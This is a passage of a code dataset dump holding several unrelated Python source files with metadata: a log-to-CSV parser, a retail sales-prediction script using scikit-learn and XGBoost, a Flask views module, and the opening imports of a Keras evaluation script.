datetime.strptime(item.time, '%m-%d %H:%M:%S.%f')\n dt = dt.replace(year=datetime.now().year)\n if debug_verbose:\n print(\"time stamp:\", dt, dt.timestamp())\n item.timestamp = dt.timestamp()\n\n csv_content = line_match_obj.group(1) + keyword_field_split\n items_match_obj = re.findall(keyword_field_regulart, csv_content)\n for item_matchObj in items_match_obj:\n print(\"items_match_obj:\", item_matchObj)\n key = item_matchObj[0].strip()\n value = item_matchObj[1].strip()\n if debug_verbose:\n print(\"items_match_obj:\", key, \":\", value)\n item.keyword_keypairs[key] = value\n return item\n else:\n return None\n\n\ndef find_last_csv_items_by_name(name, csv_items):\n for item in csv_items[::-1]:\n if item.name == name:\n return item\n return None\n\n\ndef find_first_csv_items_by_name(name, csv_items, after_item):\n after_index = 0\n if after_item is None:\n after_index = 0\n else:\n after_index = csv_items.index(after_item)\n for item in csv_items[after_index:]:\n if item.name == name:\n return item\n return None\n\n\ndef process_log_file(log_file_path, csv_items, praser):\n try:\n log_file = open(log_file_path, 'r', encoding='utf-8', errors='ignore')\n lines = log_file.readlines() # read the whole file and return its lines as a list\n log_file.close()\n except IOError as reason:\n print('Failed to read file! ' 
+ log_file_path + \":\" + str(reason))\n return None\n line_number = 0\n item_number = 0\n last_head_item = None\n for line in lines:\n line_number += 1\n item = process_log_line(line,\n praser.keyword_time_regulart,\n praser.keyword_line_regular,\n praser.keyword_field_regulart,\n praser.keyword_field_split,\n praser.keyword_head_regulart,)\n if item is not None:\n if item.head:\n item.file = log_file_path\n item.line_number = line_number\n if debug:\n item.dump()\n csv_items.append(item)\n CsvItem.update_head_keyword_keypairs(item.keyword_keypairs.keys())\n last_head_item = item\n print(\"item:\", item_number)\n item_number = item_number + 1\n elif len(item.keyword_keypairs) > 0:\n if last_head_item is not None:\n last_head_item.keyword_keypairs.update(item.keyword_keypairs)\n CsvItem.update_head_keyword_keypairs(item.keyword_keypairs.keys())\n print(\"merged into last item:\", item.keyword_keypairs)\n else:\n print(\"unable to merge, dropping item:\", item.keyword_keypairs)\n\n\ndef save_csv(csv_log_path, csv_items):\n print('csv_items:', len(csv_items))\n try:\n csv_log = open(csv_log_path, 'w', encoding='utf-8', errors='ignore')\n if len(csv_items) > 0:\n csv_log.write(csv_items[0].get_csv_head() + \"\\n\")\n for item in csv_items:\n if debug_verbose:\n item.dump()\n csv_log.write(item.get_csv_line() + \"\\n\")\n csv_log.close()\n print('Finished saving! ' + csv_log_path)\n except IOError as reason:\n print('Failed to save file! ' + csv_log_path + \":\" + str(reason))\n\n\nclass SatisticsAvg:\n def __init__(self):\n self.count = 0\n self.avg = 0\n\n def add(self, new_value):\n self.avg = round((self.avg * self.count + new_value) / (self.count + 1), 3)\n self.count += 1\n\n\ndef filter_file_names(file_name, file_name_regular):\n if re.match(file_name_regular, file_name) == None:\n return False\n else:\n return True\n\ndef find_log_files_in_dir(praser, dir_name):\n log_files = []\n try:\n files = os.listdir(dir_name)\n except IOError as reason:\n print('Failed to open working directory! ' + str(reason))\n while files:\n file_name = files.pop()\n if filter_file_names(file_name, praser.file_name_regular):\n log_files.append(file_name)\n\n log_files.sort(key=praser.file_name_sort_lambda)\n return log_files\n\ndef process_work_dir(praser, work_dir_name):\n output_path = process_log_dir(praser, work_dir_name)\n if output_path is None:\n print('No logs found in the current directory; scanning subdirectories')\n output_dir = work_dir_name + \"\\\\\" + \"battery\"\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n try:\n subdirs = os.listdir(work_dir_name)\n except IOError as reason:\n print('Failed to open working directory! ' 
+ str(reason))\n save_count = 0\n while subdirs:\n file_name = subdirs.pop()\n file_path = work_dir_name + \"\\\\\" + file_name\n if os.path.isdir(file_path):\n if process_log_dir(praser, file_path, output_dir) is not None:\n output_path = output_dir # at least one file was created\n\n if output_path is not None:\n os.system('start ' + output_path)\n\ndef process_log_dir(praser, dir_name, output_dir = None):\n csv_items = []\n CsvItem.head_keyword_keypairs = {}\n log_dir = dir_name\n output_filename = praser.file_name_output\n if output_dir is not None:\n output_filename = os.path.basename(dir_name) + \".csv\"\n else:\n output_dir = log_dir\n\n log_files = find_log_files_in_dir(praser, log_dir)\n\n for file_name in log_files:\n path = log_dir + \"\\\\\" + file_name\n if debug:\n print('Processing log file ', path)\n process_log_file(path, csv_items, praser)\n\n output_path = output_dir + \"\\\\\" + output_filename\n if len(csv_items) > 0:\n save_csv(output_path, csv_items)\n return output_path\n\n return None\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n work_dir = os.getcwd()\n if len(sys.argv) < 1:\n print('Usage:', sys.argv[0], ' ')\n os.system('pause')\n sys.exit(2)\n if len(sys.argv) >= 2:\n work_dir = sys.argv[1]\n print('Working directory:', work_dir)\n start = time.time()\n\n for praser in Log_Parsers:\n process_work_dir(praser, work_dir)\n\n end = time.time()\n print(\"Elapsed (s):\", int(end - start))\n os.system('pause')\n\n# Visit https://www.jetbrains.com/help/pycharm/ for PyCharm help\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.match", "line_number": 110, "usage_type": "call"}, {"api_name": "re.match", "line_number": 111, "usage_type": "call"}, {"api_name": "re.match", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 126, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 126, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 133, "usage_type": "call"}, {"api_name": "re.match", "line_number": 231, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 256, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 278, "usage_type": "call"}, {"api_name": "os.path", "line_number": 278, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 299, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 300, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 301, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 302, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 303, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 304, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 305, 
"usage_type": "attribute"}, {"api_name": "time.time", "line_number": 307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 312, "usage_type": "call"}, {"api_name": "os.system", "line_number": 314, "usage_type": "call"}]} +{"seq_id": "603710510", "text": "import pandas as pd\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\n#%matplotlib inline\r\nimport seaborn as sns\r\n\r\nfrom sklearn import cross_validation\r\nfrom sklearn.cross_validation import KFold, cross_val_score\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.ensemble import RandomForestRegressor,GradientBoostingRegressor, ExtraTreesRegressor\r\nfrom sklearn.neural_network import MLPRegressor\r\nimport xgboost as xgb\r\ntrain_df = pd.read_csv(\"train.csv\")\r\ntest_df = pd.read_csv(\"test.csv\")\r\ntest_df1 = pd.read_csv(\"test.csv\")\r\n\r\ntrain_df['Item_Outlet_Sales_Number'] = train_df['Item_Outlet_Sales']/train_df['Item_MRP']\r\n# convert from float to int\r\nprint(train_df.shape)\r\nprint(test_df.shape)\r\ny_Item_Outlet_Sales = pd.DataFrame(train_df.Item_Outlet_Sales.copy())\r\ny_Item_Outlet_Sales.columns = ['Item_Outlet_Sales']\r\ny_Item_Outlet_Sales_Number = train_df.Item_Outlet_Sales_Number.copy()\r\ntrain_df.drop('Item_Outlet_Sales', axis=1, inplace=True)\r\ntrain_df.drop('Item_Outlet_Sales_Number', axis=1, inplace=True)\r\ndf = pd.concat([train_df, test_df], axis=0)\r\nprint('test shape')\r\nprint(y_Item_Outlet_Sales.shape)\r\nprint(df.head())\r\nprint(df.shape)\r\nprint(df.isnull().sum())\r\ndf = df.dropna(how='all')\r\nr,c = df.shape\r\n\r\n\r\n##################################Now treatment of columns is being done #####################################################\r\n#Item_Fat_Content\r\nprint(df['Item_Fat_Content'].unique())\r\ndf['Item_Fat_Content'] = df['Item_Fat_Content'].str.lower()\r\ndf['Item_Fat_Content'] = df['Item_Fat_Content'].replace(['lf'], 'low fat')\r\ndf['Item_Fat_Content'] = df['Item_Fat_Content'].replace(['reg'], 'regular')\r\nprint(df['Item_Fat_Content'].unique())\r\ndf['Item_Fat_Content'] = df['Item_Fat_Content'].map({'low fat' : 0, 'regular' : 1})\r\nprint(df['Item_Fat_Content'].unique())\r\n\r\n#Outlet_Location_Type\r\nprint(df['Outlet_Location_Type'].unique())\r\ndf['Outlet_Location_Type'] = df['Outlet_Location_Type'].map({'Tier 1' : 1, 'Tier 2' : 2, 'Tier 3' : 3})\r\nprint(df['Outlet_Location_Type'].unique())\r\n\r\n#Outlet_Type\r\nprint(df['Outlet_Type'].unique())\r\ndf['Outlet_Type'] = df['Outlet_Type'].map({'Supermarket Type1' : 1, 'Supermarket Type2' : 2, 'Supermarket Type3' : 3, 'Grocery Store' : 4})\r\nprint(df['Outlet_Type'].unique())\r\n\r\n#Outlet_Type\r\nprint(df['Item_Type'].unique())\r\ndf['Item_Type'] = df['Item_Type'].map({'Dairy' : 1, 'Soft Drinks' : 2, 'Meat' : 3, 'Fruits and Vegetables' : 4, 'Household' : 5, 'Baking Goods' : 6, 'Snack Foods' : 7, 'Frozen Foods' : 8, 'Breakfast' : 9, 'Health and Hygiene' : 10, 'Hard Drinks': 11, 'Canned' : 12, 'Breads' : 13, 'Starchy Foods' : 14, 'Others' : 15,'Seafood' : 16})\r\nprint(df['Item_Type'].unique())\r\n\r\nprint(df.head())\r\n\r\n# replace nan on Item weight and Outlet size\r\ndf['Item_Weight'] = df['Item_Weight'].fillna(df['Item_Weight'].median())\r\ndf['Outlet_Size'] = df['Outlet_Size'].fillna(df['Outlet_Size'].mode()[0])\r\ndf['Outlet_Size'] = df['Outlet_Size'].map({'High' : 1, 'Medium' : 2, 'Small' : 3})\r\nprint(df['Outlet_Size'].unique())\r\n\r\n#df.drop('Item_Visibility', axis=1, inplace=True)\r\n\r\n#df.hist(column='Item_MRP', bins=50)\r\n\r\nfigure = 
plt.figure(figsize=(8,5))\r\nplt.hist(df['Item_MRP'], bins=np.arange(df['Item_MRP'].min(), df['Item_MRP'].max()+1))\r\nplt.xlabel('Item_MRP')\r\nplt.legend()\r\nplt.show()\r\n\r\ndf['Item_Type'] = (df['Item_Type']).astype(int)\r\ndf.loc[ df['Item_MRP'] <= 69, 'Item_MRP'] = 1\r\ndf.loc[(df['Item_MRP'] > 69) & (df['Item_MRP'] <= 136), 'Item_MRP'] = 2\r\ndf.loc[(df['Item_MRP'] > 136) & (df['Item_MRP'] <= 203), 'Item_MRP'] = 3\r\ndf.loc[(df['Item_MRP'] > 203), 'Item_MRP'] = 4\r\n\r\n\r\nmax_visi = df['Item_Visibility'].max()\r\nmin_visi = df['Item_Visibility'].min()\r\nqrt_visi = (max_visi + min_visi)/4 * 1000\r\nprint(qrt_visi)\r\ndf['Item_Visibility'] = df['Item_Visibility'].astype(int)\r\ndf[\"Item_Visibility\"] = df[\"Item_Visibility\"].apply(lambda x: x * 1000)\r\ndf.loc[ df['Item_Visibility'] <= qrt_visi, 'Item_Visibility'] = 1\r\ndf.loc[(df['Item_Visibility'] > qrt_visi) & (df['Item_Visibility'] <= (2*qrt_visi)), 'Item_Visibility'] = 2\r\ndf.loc[(df['Item_Visibility'] > (qrt_visi*2)) & (df['Item_Visibility'] <= (3*qrt_visi)), 'Item_Visibility'] = 3\r\ndf.loc[(df['Item_Visibility'] > (qrt_visi*3)), 'Item_Visibility'] = 4\r\nprint(df['Item_Visibility'].unique())\r\n\r\ndf[\"Outlet_Establishment_Year\"] = df[\"Outlet_Establishment_Year\"].apply(lambda x: 2013 - x)\r\n\r\n\r\n\t\t\r\nprint(df.shape)\r\nItem_Fat_Content_dummies = pd.get_dummies(df['Item_Fat_Content'],prefix=\"Item_Fat_Content\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Item_Fat_Content_dummies],axis=1) \r\ndf.drop('Item_Fat_Content',axis=1,inplace=True)\r\n\r\nItem_Visibility_dummies = pd.get_dummies(df['Item_Visibility'],prefix=\"Item_Visibility\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Item_Visibility_dummies],axis=1) \r\ndf.drop('Item_Visibility',axis=1,inplace=True)\r\n\r\nItem_Type_dummies = pd.get_dummies(df['Item_Type'],prefix=\"Item_Type\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Item_Type_dummies],axis=1) \r\ndf.drop('Item_Type',axis=1,inplace=True)\r\n\r\nItem_MRP_dummies = pd.get_dummies(df['Item_MRP'],prefix=\"Item_MRP\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Item_MRP_dummies],axis=1) \r\ndf.drop('Item_MRP',axis=1,inplace=True)\r\n\r\nOutlet_Size_dummies = pd.get_dummies(df['Outlet_Size'],prefix=\"Outlet_Size\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Outlet_Size_dummies],axis=1) \r\ndf.drop('Outlet_Size',axis=1,inplace=True)\r\n\r\nOutlet_Location_Type_dummies = pd.get_dummies(df['Outlet_Location_Type'],prefix=\"Outlet_Location_Type\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Outlet_Location_Type_dummies],axis=1) \r\ndf.drop('Outlet_Location_Type',axis=1,inplace=True)\r\n\r\nOutlet_Type_dummies = pd.get_dummies(df['Outlet_Type'],prefix=\"Outlet_Type\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Outlet_Type_dummies],axis=1) \r\ndf.drop('Outlet_Type',axis=1,inplace=True)\r\n\r\ndf.drop('Item_Identifier',axis=1,inplace=True)\r\ndf.drop('Outlet_Identifier',axis=1,inplace=True)\r\n\r\nprint(df.isnull().sum())\r\n\r\ntrain = df.iloc[:8523,]\r\ntest = df.iloc[8523:,:]\r\nprint(train.shape)\r\nprint(y_Item_Outlet_Sales.shape)\r\n\r\n\r\n#train['Item_Outlet_Sales'] = y_Item_Outlet_Sales[['Item_Outlet_Sales']]\r\nestimators = [50, 75, 100, 125, 150, 200, 250, 500]\r\n'''\r\nfor e in estimators:\r\n xg = xgb.XGBRegressor(n_estimators = e)\r\n \r\n# plt.figure(figsize=(10,10))\r\n xg.fit(train, y_Item_Outlet_Sales['Item_Outlet_Sales'])\r\n print(train.dtypes)\t\r\n 
print(xg.feature_importances_)\r\n xgb.plot_importance(xg, importance_type='gain')#, ax=ax1)\r\n'''\t\r\ndef prediction_function(train, test):\r\n estimators = [50, 75, 80, 100, 125, 150, 200, 250, 500]\r\n\r\n final = []\r\n\r\n for e in estimators:\r\n rf = RandomForestRegressor(random_state = 1, n_estimators = e, min_samples_split = 8, min_samples_leaf = 4)\r\n gbr = GradientBoostingRegressor(random_state = 1, n_estimators = e, min_samples_split = 8, \r\n min_samples_leaf = 4, learning_rate = 0.1)\r\n xg = xgb.XGBRegressor(n_estimators = e)\r\n\r\n rf.fit(train, train['Item_Outlet_Sales'])\r\n predictions_rf = rf.predict(test)\r\n predictions_rf = predictions_rf.astype(int)\r\n\r\n gbr.fit(train, train['Item_Outlet_Sales'])\r\n predictions_gbr = gbr.predict(test)\r\n predictions_gbr = predictions_gbr.astype(int)\r\n\r\n xg.fit(train, train['Item_Outlet_Sales'])\r\n predictions_xg = xg.predict(test)\r\n predictions_xg = predictions_xg.astype(int)\r\n\r\n mse_rf = (np.sqrt(mean_squared_error(test['Item_Outlet_Sales'], predictions_rf)), 'RF')\r\n mse_gbr = (np.sqrt(mean_squared_error(test['Item_Outlet_Sales'], predictions_gbr)), 'GBR')\r\n mse_xg = (np.sqrt(mean_squared_error(test['Item_Outlet_Sales'], predictions_xg)), 'XGB')\r\n\r\n error_min = min(mse_rf, min(mse_gbr, mse_xg))\r\n# print(error_min)\r\n final.append((error_min, e))\r\n\r\n min_final = min(final)\r\n print(\"Minimum MSE, regressor to use and number of estimators: \"+str(min_final))\r\n return list(min_final)\r\ntrain = pd.concat([train, y_Item_Outlet_Sales], axis=1)\r\n#print(train.head())\r\n\t\r\ntrain_tmp = train[:int(train.shape[0]*0.8)]\r\ntest_tmp = train[int(train.shape[0]*0.8):]\r\n\r\nmin_final = prediction_function(train_tmp, test_tmp)\r\n\r\ne_to_use = min_final[1]\r\nregressor_to_use = min_final[0][1]\r\n# print(\"Mimimum RMSE error was for \"+str(regressor_to_use)+\" with \"+str(e_to_use)+\" estimators\")\r\n\r\nif(regressor_to_use == 'RF'):\r\n reg = RandomForestRegressor(random_state = 1, n_estimators = e_to_use, min_samples_split = 8, min_samples_leaf = 4)\r\nelif(regressor_to_use == 'GBR'):\r\n reg = GradientBoostingRegressor(random_state = 1, n_estimators = e_to_use, min_samples_split = 8, min_samples_leaf = 4, learning_rate = 0.2)\r\nelse:\r\n reg = xgb.XGBRegressor(n_estimators = e_to_use)\r\ntrain.drop('Item_Outlet_Sales', axis=1, inplace=True)\r\nreg.fit(train, y_Item_Outlet_Sales['Item_Outlet_Sales'])\r\npredictions = reg.predict(test)\r\npredictions = predictions.astype(int)\r\n\r\nsub = pd.DataFrame({'Item_Identifier' : test_df1['Item_Identifier'], 'Outlet_Identifier' : test_df1['Outlet_Identifier'], 'Item_Outlet_Sales' : predictions})\r\nsub.to_csv('output.csv', index=False)", "sub_path": "AnalyticsVidhya/bigdatamart/Sol1.py", "file_name": "Sol1.py", "file_ext": "py", "file_size_in_byte": 9272, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 75, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "pandas.get_dummies", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 109, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 111, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 114, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 121, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 168, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 169, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 185, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 186, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 187, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 209, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 211, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 213, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "342810913", "text": "import json\nimport os.path\n\nfrom flask import redirect, render_template, request, send_from_directory, url_for\nfrom flask_babelex import gettext\nfrom markupsafe import Markup\n\nfrom project import app, cache_path, dump_path, robots_txt_file, sitemap_file\nfrom project.services.admin import upsert_settings\nfrom project.views.utils import track_analytics\n\n\n@app.route(\"/\")\ndef home():\n if \"src\" in request.args:\n track_analytics(\"home\", \"\", request.args[\"src\"])\n return redirect(url_for(\"home\"))\n\n structured_data = json.dumps(\n {\n \"@context\": \"http://schema.org\",\n \"@type\": \"WebSite\",\n 
\"name\": \"Oveda\",\n \"url\": url_for(\"home\", _external=True),\n }\n )\n\n return render_template(\n \"home.html\",\n structured_data=structured_data,\n admin_unit_create_requires_admin=app.config[\"ADMIN_UNIT_CREATE_REQUIRES_ADMIN\"],\n )\n\n\n@app.route(\"/example\")\ndef example():\n return render_template(\"example.html\")\n\n\n@app.route(\"/tos\")\ndef tos():\n title = gettext(\"Terms of service\")\n settings = upsert_settings()\n content = Markup(settings.tos)\n return render_template(\"legal.html\", title=title, content=content)\n\n\n@app.route(\"/legal_notice\")\ndef legal_notice():\n title = gettext(\"Legal notice\")\n settings = upsert_settings()\n content = Markup(settings.legal_notice)\n return render_template(\"legal.html\", title=title, content=content)\n\n\n@app.route(\"/contact\")\ndef contact():\n title = gettext(\"Contact\")\n settings = upsert_settings()\n content = Markup(settings.contact)\n return render_template(\"legal.html\", title=title, content=content)\n\n\n@app.route(\"/privacy\")\ndef privacy():\n title = gettext(\"Privacy\")\n settings = upsert_settings()\n content = Markup(settings.privacy)\n return render_template(\"legal.html\", title=title, content=content)\n\n\n@app.route(\"/developer\")\ndef developer():\n file_name = \"all.zip\"\n all_path = os.path.join(dump_path, file_name)\n dump_file = None\n\n if os.path.exists(all_path):\n dump_file = {\n \"url\": url_for(\"dump_files\", path=file_name),\n \"size\": os.path.getsize(all_path),\n \"ctime\": os.path.getctime(all_path),\n }\n else:\n app.logger.info(\"No file at %s\" % all_path)\n\n return render_template(\"developer/read.html\", dump_file=dump_file)\n\n\n@app.route(\"/favicon.ico\")\ndef static_from_root():\n return send_from_directory(app.static_folder, request.path[1:])\n\n\n@app.route(\"/robots.txt\")\ndef robots_txt():\n return send_from_directory(cache_path, robots_txt_file)\n\n\n@app.route(\"/sitemap.xml\")\ndef sitemap_xml():\n return send_from_directory(cache_path, sitemap_file)\n", "sub_path": "project/views/root.py", "file_name": "root.py", "file_ext": "py", "file_size_in_byte": 2699, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.request.args", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "project.views.utils.track_analytics", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 17, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 28, "usage_type": "call"}, {"api_name": "project.app.config", "line_number": 31, "usage_type": "attribute"}, {"api_name": "project.app", "line_number": 31, "usage_type": "name"}, {"api_name": "project.app.route", "line_number": 13, "usage_type": "call"}, {"api_name": "project.app", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 37, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 35, "usage_type": "call"}, {"api_name": "project.app", "line_number": 35, "usage_type": "name"}, {"api_name": 
"flask_babelex.gettext", "line_number": 42, "usage_type": "call"}, {"api_name": "project.services.admin.upsert_settings", "line_number": 43, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 40, "usage_type": "call"}, {"api_name": "project.app", "line_number": 40, "usage_type": "name"}, {"api_name": "flask_babelex.gettext", "line_number": 50, "usage_type": "call"}, {"api_name": "project.services.admin.upsert_settings", "line_number": 51, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 53, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 48, "usage_type": "call"}, {"api_name": "project.app", "line_number": 48, "usage_type": "name"}, {"api_name": "flask_babelex.gettext", "line_number": 58, "usage_type": "call"}, {"api_name": "project.services.admin.upsert_settings", "line_number": 59, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 56, "usage_type": "call"}, {"api_name": "project.app", "line_number": 56, "usage_type": "name"}, {"api_name": "flask_babelex.gettext", "line_number": 66, "usage_type": "call"}, {"api_name": "project.services.admin.upsert_settings", "line_number": 67, "usage_type": "call"}, {"api_name": "markupsafe.Markup", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 69, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 64, "usage_type": "call"}, {"api_name": "project.app", "line_number": 64, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "project.dump_path", "line_number": 75, "usage_type": "argument"}, {"api_name": "os.path.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.path.getsize", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.path.getctime", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 82, "usage_type": "name"}, {"api_name": "project.app.logger.info", "line_number": 85, "usage_type": "call"}, {"api_name": "project.app.logger", "line_number": 85, "usage_type": "attribute"}, {"api_name": "project.app", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}, {"api_name": "project.app.route", "line_number": 72, "usage_type": "call"}, {"api_name": "project.app", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 92, "usage_type": "call"}, {"api_name": "project.app.static_folder", "line_number": 92, "usage_type": 
"attribute"}, {"api_name": "project.app", "line_number": 92, "usage_type": "name"}, {"api_name": "flask.request.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "project.app.route", "line_number": 90, "usage_type": "call"}, {"api_name": "project.app", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 97, "usage_type": "call"}, {"api_name": "project.cache_path", "line_number": 97, "usage_type": "argument"}, {"api_name": "project.robots_txt_file", "line_number": 97, "usage_type": "argument"}, {"api_name": "project.app.route", "line_number": 95, "usage_type": "call"}, {"api_name": "project.app", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 102, "usage_type": "call"}, {"api_name": "project.cache_path", "line_number": 102, "usage_type": "argument"}, {"api_name": "project.sitemap_file", "line_number": 102, "usage_type": "argument"}, {"api_name": "project.app.route", "line_number": 100, "usage_type": "call"}, {"api_name": "project.app", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "212358478", "text": "###################################################\n#\n# Script to\n# - Calculate prediction of the test dataset\n# - Calculate the parameters to evaluate the prediction\n#\n##################################################\n\n#Python\nimport numpy as np\nimport configparser\nfrom matplotlib import pyplot as plt\n\n#Keras\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.metrics import BinaryAccuracy, Precision, Recall, TruePositives, TrueNegatives, FalsePositives, 